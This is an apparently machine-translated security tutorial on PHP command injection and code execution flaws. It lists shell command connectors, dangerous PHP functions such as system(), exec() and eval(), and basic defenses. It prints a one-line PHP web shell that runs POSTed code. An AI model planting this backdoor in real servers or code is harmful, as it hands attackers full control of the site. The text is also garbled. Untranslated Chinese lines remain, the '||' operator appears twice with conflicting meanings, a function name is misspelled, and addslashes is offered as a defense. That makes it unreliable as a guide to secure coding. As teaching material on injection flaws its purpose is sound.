table of Contents
1. Command execution vulnerability
1. Common command execution functions in PHP
2. Command execution vulnerability defense
2. Code execution vulnerabilities
2. Code execution function in PHP
3. Code execution vulnerability defense
1. Command execution vulnerability
When programmers use scripting languages (such as PHP) to develop applications, the development of scripting languages is very fast, brief, and convenient, but there are also some problems. For example, if the speed is slow, or the bottom layer of the system cannot be reached, if the application we develop, especially some enterprise-level applications, we need to call some external programs. When the application needs to call some external programs, it will use some system command functions. When the application calls these functions to execute system commands, if the user's input is spliced into the command line as the parameters of the system command, it will cause command execution loopholes without filtering the user's input.
In other words, the command execution directly calls the command of the operating system. The principle is that in the operating system, "&, |, ||" can all be used as command connectors. The user submits the execution command through the browser. Since the server does not filter the execution function, the user's input is used as a system command The parameters of is spliced into the command line, causing command execution loopholes without filtering user input.
command1&command2 两个命令同时执行,前面执行不成功后面也执行
command1&&command2 只有前面命令执行成功,后面命令才继续执行
command1;command2 不管前面命令执行成功没有,后面的命令继续执行(Linux)
command1||command2 将一个命令的标准输出作为另外一个命令的标准输入。当第一条命令失败时,它仍然会执行第二条命令
command1||command2 顺序执行多条命令,当碰到执行正确的命令后将不执行后面的命令1. Common command execution functions in PHP
- system(): execute string as OS command, with output function, no need to print
- exec(): Execute the string as an OS command, and need to output the execution result
- shell_exec(): execute the shell command and return the output string
- passthru(): execute the string as an OS command, with its own output function, no need to print
- `` (backquote): Same function as shell_exec function
- popen()
Command execution case, portal- " DVWA's command injection vulnerability (Command injection)
2. Command execution vulnerability defense
1. Minimize the use of command execution functions and disable them in disable_functions
2. Before entering the function or method executed by the command, filter the parameters
3. Use quotes to wrap the parameter value as much as possible, and call addslashes to escape before splicing
2. Code execution vulnerabilities
When an application calls some functions that can convert a string into code (such as eval() in PHP, eval can execute a string as a function), it does not consider whether the user controls the string, which will cause code execution loopholes. It is generally difficult to find vulnerabilities through black boxes, and most of them judge code execution vulnerabilities based on source code.
Code execution (injection) is similar to SQL injection vulnerabilities. SQLi is to inject SQL statements into the database for execution, while code execution can inject code into the application and finally run it by the server. If such vulnerabilities are not specially filtered, it is equivalent to the existence of a Web backdoor directly.
1. Vulnerability
You can inherit Web user permissions through code execution vulnerabilities and execute arbitrary code. If the server is not configured correctly and the Web user permissions are relatively high, we can read and write any file content on the target server, and even control the entire website and server.
2. Code execution function in PHP
- eval() executes the string as php code
- assert() will also be executed as PHP code
- call_user_func() callback function, you can use is_callable to see if it can be called
- call_user_fuc_array() callback function, the parameter is an array
- create_function() creates an anonymous function
- preg_replace() When the php version is less than 7, the code will be executed when it is /e
- array_map() applies a callback function to each element of the array
- array_filter() passes each value in the array to the callback function in turn. If the callback function returns true, the current value of the array will be included in the returned result array. The key names of the array remain unchanged.
- usort() uses a custom function to sort the array
In a word, Trojan horses are exploited code execution vulnerabilities:
<?php @eval($_POST[cmd]);?>3. Code execution vulnerability defense
- Ensure that users cannot easily access the parameters of the eval() function or use regular rules to strictly judge the input data format
- The string is wrapped in single quotes, and addslashes() is performed before inserting
- Give up the use of the e modifier for preg_replace(), and ensure that the second parameter is wrapped in single quotes for the objects matched by the regularity.